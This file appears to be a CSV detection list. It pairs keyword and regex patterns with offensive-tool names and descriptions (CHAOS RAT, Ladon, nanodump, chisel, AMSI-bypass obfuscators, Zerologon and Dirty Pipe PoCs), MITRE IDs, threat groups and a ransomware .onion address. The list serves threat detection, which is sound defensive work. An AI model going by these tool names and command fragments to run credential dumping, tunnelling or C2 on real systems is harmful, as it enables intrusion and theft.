"*CHAOS (Remote Administration Tool)*",".{0,1000}CHAOS\s\(Remote\sAdministration\sTool\).{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","38130"
"*chaos*persistence_enable*",".{0,1000}chaos.{0,1000}persistence_enable.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","38131"
"*charlesnathansmith/whatlicense*",".{0,1000}charlesnathansmith\/whatlicense.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","38132"
"*charles-proxy*",".{0,1000}charles\-proxy.{0,1000}","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38133"
"*charlotte-main.zip*",".{0,1000}charlotte\-main\.zip.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","38134"
"*chatc46k7dqtvvrgfqjs6vxrwnmudko2ptiqvlb7doqxxqtjc22tsiad.onion*",".{0,1000}chatc46k7dqtvvrgfqjs6vxrwnmudko2ptiqvlb7doqxxqtjc22tsiad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38136"
"*ChatLadon.exe*",".{0,1000}ChatLadon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","38137"
"*ChatLadon.rar*",".{0,1000}ChatLadon\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","38138"
"*chaudharyarjun/LooneyPwner*",".{0,1000}chaudharyarjun\/LooneyPwner.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","38144"
"*check that our dll as been injected : NTHASH*",".{0,1000}check\sthat\sour\sdll\sas\sbeen\sinjected\s\:\sNTHASH.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","38145"
"*check_and_write_IAT_Hook*",".{0,1000}check_and_write_IAT_Hook.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","38146"
"*check_cve-2020-1472.py*",".{0,1000}check_cve\-2020\-1472\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","Dispossessor","Exploitation tool","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","N/A","1","11","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z","38147"
"*check_function ntdll.dll EtwEventWrite*",".{0,1000}check_function\sntdll\.dll\sEtwEventWrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","38148"
"*check_ppl_requirements*",".{0,1000}check_ppl_requirements.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","38149"
"*check_sudo_nopasswd_binaries(*",".{0,1000}check_sudo_nopasswd_binaries\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content #linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","38150"
"*checkIfHiddenAPICall*",".{0,1000}checkIfHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","38151"
"*Check-LocalAdminHash.ps1*",".{0,1000}Check\-LocalAdminHash\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","38152"
"*CheckPort.csproj*",".{0,1000}CheckPort\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","38153"
"*CheckSMBSigning -Targets *",".{0,1000}CheckSMBSigning\s\-Targets\s.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","38154"
"*CheeseDCOM.exe*",".{0,1000}CheeseDCOM\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38155"
"*CheeseExec.csproj*",".{0,1000}CheeseExec\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38156"
"*CheeseExec.exe*",".{0,1000}CheeseExec\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38157"
"*CheesePS.csproj*",".{0,1000}CheesePS\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38158"
"*CheesePS.exe*",".{0,1000}CheesePS\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38159"
"*CheeseRDP.exe*",".{0,1000}CheeseRDP\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38160"
"*CheeseSQL.exe*",".{0,1000}CheeseSQL\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38161"
"*CheeseTools.sln*",".{0,1000}CheeseTools\.sln.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38162"
"*CheeseTools-master*",".{0,1000}CheeseTools\-master.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38163"
"*cheetah.py -*",".{0,1000}cheetah\.py\s\-.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","38164"
"*chenjiandongx/sniffer*",".{0,1000}chenjiandongx\/sniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","38165"
"*Chimera-main.zip*",".{0,1000}Chimera\-main\.zip.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","38168"
"*Chimera-master.zip*",".{0,1000}Chimera\-master\.zip.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","38169"
"*chisel -*",".{0,1000}chisel\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38171"
"*chisel client -*",".{0,1000}chisel\sclient\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38172"
"*chisel client http*",".{0,1000}chisel\sclient\shttp.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38173"
"*chisel server -*",".{0,1000}chisel\sserver\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38174"
"*chisel.exe *",".{0,1000}chisel\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38176"
"*chisel.exe client*",".{0,1000}chisel\.exe\sclient.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38177"
"*chisel.exe server*",".{0,1000}chisel\.exe\sserver.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38178"
"*chisel.jpillora.com*",".{0,1000}chisel\.jpillora\.com.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38179"
"*chisel_1*_darwin_*.gz*",".{0,1000}chisel_1.{0,1000}_darwin_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38180"
"*chisel_1*_linux_*.gz*",".{0,1000}chisel_1.{0,1000}_linux_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38181"
"*chisel_linux_amd64*",".{0,1000}chisel_linux_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38182"
"*chisel_windows_amd64.exe*",".{0,1000}chisel_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38183"
"*chisel-master.zip*",".{0,1000}chisel\-master\.zip.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38184"
"*chknull.zip*",".{0,1000}chknull\.zip.{0,1000}","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","N/A","1","4","1","2024-06-27T09:35:42Z","2023-04-16T01:49:12Z","38187"
"*chmod +x /usr/lib/systemd/system-generators/makecon*",".{0,1000}chmod\s\+x\s\/usr\/lib\/systemd\/system\-generators\/makecon.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","38188"
"*chmod +x dirty*",".{0,1000}chmod\s\+x\sdirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","0","#linux","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","38189"
"*chmod +x evil.php*",".{0,1000}chmod\s\+x\sevil\.php.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","38190"
"*chmod +x pwnkit*",".{0,1000}chmod\s\+x\spwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","38191"
